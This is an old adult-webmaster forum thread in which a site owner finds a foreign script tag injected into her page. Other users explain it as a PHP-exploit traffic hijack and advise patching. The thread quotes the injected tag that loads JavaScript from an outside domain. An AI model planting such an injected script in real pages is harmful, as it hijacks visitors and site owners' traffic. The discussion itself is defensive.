I am one pissed off bitch.......
 

I went in to review galleries tonight and I found a strange line of code in my html for my main page...... I didn't put it here but it is here all the same........... can ANYONE tell me who this is or what it means? I won't post the entire tag, as I am not sure what it is, but I will show you the link:

http://pornyoucaneat.com/counter.js

It is in the form of a javascript and is inclosed in my body tag with a closing body tag right after it......... has anyone ever seen this before or can help me here?

GOD, I need THIS tonight............

it is in the source code at http://www.realmaturesex.com/tgp/index.shtml if you need a better vision of what I am talking about.........

is it part of sexlist?

<.!-- BEGIN SEXLIST REFERRER-STATS CODE -->
<.body>
<.script language="JavaScript" src="http://pornyoucaneat.com/counter.js"><./script>
<./body>

No it isn't, I checked that, that is NOT part of my sexlist code, and it isn't on any other page on my site, just that one .............. I checked the Sexlist code from Sexlist bringing it here....... Someone just cleverly put it in there and made it LOOK like it is part of that........

are you hosted on a win2k box?

hmm, and that .js is empty

http://archives.neohapsis.com/archiv...1-q4/0006.html

It has something to do with this, a friend of mine just took the js thingie apart for me and this is what he found...... I have NO idea........ stealing MY traffic, if that is what it is is kinda crazy......... you get more blood from a damn turnip right now......... It was up to like 5-7 k a day and has dropped back to about 2500 or some shit now.

the whois on that domain is weird





typo edit

Why is it so weird? Nothing seemed weird about it to me.........

I went and looked again, what's weird about it?

its a script that steals your traffic if your host isnt up to date with its php they can get ya while you use cjultra This was from a good friend that works at prohosters.com I swear if i didnt get a dedicated server i would go with them in a heart beat

[email protected]

usually sex forums have something to do with hotlinking or stealing of somekind

there was that big movie forum hotlinking everyones movies.
big threads on it

Va2k: have you ever heard of someone putting a counter.js code in a body text of a webpage and then the traffic starts to die off from 5to 7k a day down to 2500k
Htmlplace.com: yup
Va2k: really
Htmlplace.com: usually they get in via a php exploit somewhere
Va2k: well it has happen to *** from *********.com she is pissed
Htmlplace.com: ahh shit
Va2k: i knew if anyone would know you would lmao
Htmlplace.com: her host needs to upgrade php
Va2k: <body>
<script language="JavaScript" src="http://pornyoucaneat.com/counter.js"></script>
</body>

Htmlplace.com: with no code in the js right ?
Va2k: right
Htmlplace.com: heh yup
Htmlplace.com: thats an exploit thats redirecting traffic
Va2k: holy shit that is fucking wicked
Va2k: she wants to know is its possible it came in though cjultra,
Htmlplace.com: yup if her host is not up to date with php
Va2k: your a life savers she jsut said she just picked up 65 new hits since she deleted it
Htmlplace.com: thats cool
Htmlplace.com: tell her to have her web host upgrade php
Htmlplace.com: to at least version 4.1.2
Va2k: yea i just put it on gfy self and where i got the info didnt say a name incase ya didnt want that
Va2k: her tech is doing that now

but the thing is HOW did it get there

http://security.e-matters.de/advisories/012002.html


Explains it all :thumbsup

:glugglug

Oh boy oh boy...... I get to EAT someone alive tonight........... good god......... what kinda desperation does someone have to wanna hack MY shit, at best they may get SE traffic, and quite a bit of it, but my traffic is sooo not "ALL THAT"

I am just REAL damn pissed.........

Thanks so much guys, especially you va2k for sitting up with me and helping me try and get to the bottom of this shit.

go crucify them Tam!!! :winkwink:

nice job va2K... :thumbsup

Oh GOD, they haven't even SEEN a pissed off rude bitch til now......... jesus, I am going to freak all over someone. lol

va2k is the shit......... damn......... LMAO

i got yer back f00

lemme at 'em

Tam,

Hit me up on ICQ va2k went to bed ... I can tell you what to look for :winkwink:

btw .... ICQ is 4433144 ... under the name of htmlplace.com :thumbsup

it might not necessarily be a php exploit, there are hundred of different exploits out there, and new ones out daily.